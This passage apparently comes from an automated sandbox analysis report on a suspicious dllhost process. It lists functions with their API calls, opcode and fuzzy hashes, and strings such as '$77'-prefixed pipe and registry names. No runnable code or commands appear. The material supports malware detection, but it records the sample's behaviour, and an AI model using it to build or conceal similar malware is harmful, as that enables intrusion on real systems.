                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: c7f1ceff66ce641fd8b5b951e0469dc10373f6cb6cf158f1536627b03372fdce
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 1C417173618B84CAE764CF61E48839E77B2F788B98F448529DA8947758DF3CC589CB40
                                                                                                                                  Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                  • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                  • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                  • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                                                                                  Function 00000290EDD0242C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: 682b49e6e14f7fdb217c837473fc1ca81f87b88d09956671ad243240f5d1dae6
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: F7119D32A29B4486F710CF21F49831AB770FB89BE4F504611EA9903BA8CF7CC148CB40
                                                                                                                                  Function 00000290EDB06E10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: a7fa7af371fd17fa73086cc8e644d49582d24c7134678540973913d4a789d242
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 9481E469A0124DCEFA509B2598DD39BB2D7EF46780F548D25AAC94F3D6FB38C845D300
                                                                                                                                  Function 00000290EDD07A10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 5954eaa256ddc6af3ca163f991b22697079b9af7d5074fd977cb417efdb3c58e
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: 1581E420F0C64DAEFB60AB6598CD3A977A3EFC57A0F544C15EAC84B792DB78C8458740
                                                                                                                                  Function 00000290EDD0986C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD098F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD098FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD09929
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD09997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD099A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction ID: 23016b8fb16746099a194b7639ccfc3a29c8ec9622d2ef254e4e23a8cf081c5c
                                                                                                                                  • Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction Fuzzy Hash: F831F731B0BB4899EE11DB16A8887A93395FF84BA0F5D5E25ED9D47394EF38C444C300
                                                                                                                                  Function 00000290EDD131C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction ID: 65011cf7190098a409171f0f8a62a6b81e1d5037cc5249a7dee92fc94ff252bd
                                                                                                                                  • Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction Fuzzy Hash: 4911C431B19B488AE7508B56F89871973B0FB89FE4F440624EE9E87BA4DF3CC4548740
                                                                                                                                  Function 00000290EDD03C98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430
                                                                                                                                  • Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction ID: a2463897722fdd8c6f325274cb1865d33b6282fb93650d684794a6c0b6ea4905
                                                                                                                                  • Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction Fuzzy Hash: D8118E26B097458AEF149B61E48C3697272FF88B84F040825DECD03758EF3DC644C704
                                                                                                                                  Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Delete$CloseEnumOpen
                                                                                                                                  • String ID: SOFTWARE\$77config
                                                                                                                                  • API String ID: 3013565938-1431229562
                                                                                                                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                                                                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                                                                                                  Function 00000290EDD06030 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction ID: 41440ba5e835194d9d529bd30d4a2678511a27a67514a8d62ef0ee4e19f8141a
                                                                                                                                  • Opcode Fuzzy Hash: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction Fuzzy Hash: C4D1AB76608B8C8ADA70DB16E4D835A77A1FBC8B98F104516EACD87BA5CF3CC541DB40
                                                                                                                                  Function 00000290EDD03398 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 756756679-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 669c697888848021f8922fef6ab105df3638f2f39dff79802482be5e1ea86a69
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 0D31B621B09B598AEB12CF56E5C8769B7A5FF85B80F084830DFC94BB55EF38C4A18700
                                                                                                                                  Function 00000290EDD0C700 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: 2d9ffea13385dec9cf12dcc3509d1b14bbe88d0b47864e351d4399bfacee81c9
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: 3911A020F4C24C4AFA58A735A8DE36E3253EFC8BA0F544D28E8DA473C6DE29C8025340
                                                                                                                                  Function 00000290EDD01A30 Relevance: 9.0, APIs: 6, Instructions: 41stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4193868204-0
                                                                                                                                  • Opcode ID: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction ID: d661800efa3240ec4de513965658333c237049b6fcd87697b61c49dbb89adfd9
                                                                                                                                  • Opcode Fuzzy Hash: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction Fuzzy Hash: 39012D65B19B498AEA64DB12A8D835972B1FB88FC0F848834DE8A43794DF7CC5468740
                                                                                                                                  Function 00000290EDD03BE4 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: 17c0a6ca3dc54e9e9de97347c6af6b4d0a76fb0d59e4ca0d8aebd7fbcdb0241b
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: F7014425A0A7498AFB249B62E88C71573B1FF85B95F040828CDCD463A8EF3DC158C704
                                                                                                                                  Function 00000290EDD01AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: 65c2bdc854f18125b3be31e2ef706afdde203de50b560e908ed50615ee4e333c
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: C5F0686270868996E720CF25F9D87597371FB85B88F844420DAC987594DF7CC69CC700
                                                                                                                                  Function 00000290EDD034D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 16b84009459c99c84a585b4f23ed7aa823fa11f005a1afe77e13825b4b4ca1a2
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: C1F08260B19B8886EA408B13B99C219B221EF89FC0F489830EE8607B28DE2CC4418300
                                                                                                                                  Function 00000290EDD0B6C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
